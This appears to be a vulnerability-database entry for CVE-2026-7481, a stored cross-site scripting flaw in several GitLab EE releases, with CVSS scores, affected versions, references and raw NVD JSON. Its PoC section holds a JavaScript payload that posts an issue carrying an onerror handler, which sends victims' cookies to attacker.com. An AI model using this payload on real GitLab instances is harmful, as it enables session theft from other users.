Security Vulnerability Report
CVE-2026-7481 CVSS 8.7 HIGH

CVE-2026-7481

Published: 2026-05-14 06:16:26
Last Modified: 2026-05-14 18:50:43

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 16.4 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with developer-role permissions to execute arbitrary JavaScript in other users' browsers due to improper input sanitization.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (16.4 up to, but not including, 18.9.7) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.10 up to, but not including, 18.10.6) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (18.11 up to, but not including, 18.11.3) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// Conceptual PoC for Stored XSS in GitLab
// Attacker injects payload via API or UI
const maliciousPayload = '<img src=x onerror=fetch(\'https://attacker.com/steal?c=\'+document.cookie)>';

// Simulating the request to store the payload
fetch('https://gitlab.example.com/api/v4/projects/1/issues', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <ATTACKER_TOKEN>'
  },
  body: JSON.stringify({
    title: 'Important Issue',
    description: maliciousPayload
  })
}).then(response => console.log('Payload injected'));
// When a victim views the issue, the script executes and exfiltrates cookies.
```

References

https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ (Release Notes)
https://gitlab.com/gitlab-org/gitlab/-/work_items/598646 (Broken Link)
https://hackerone.com/reports/3697379 (Permissions Required)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-7481", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:25.660", "lastModified": "2026-05-14T18:50:42.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 16.4 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with developer-role permissions to execute arbitrary JavaScript in other users' browsers due to improper input sanitization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.4.0", "versionEndExcluding": "18.9.7", "matchCriteriaId": "ACF146E3-AD48-4493-89F1-2F26D172A4C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.6", "matchCriteriaId": "E79D4F10-88B3-4AA7-BC5E-3FC8FA698969"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.11.0", "versionEndExcluding": "18.11.3", "matchCriteriaId": "DA0D6580-3530-4D76-81CE-D852BCE0D411"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/598646", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3697379", "source": "[email protected]", "tags": ["Permissions Required"]}]}}
```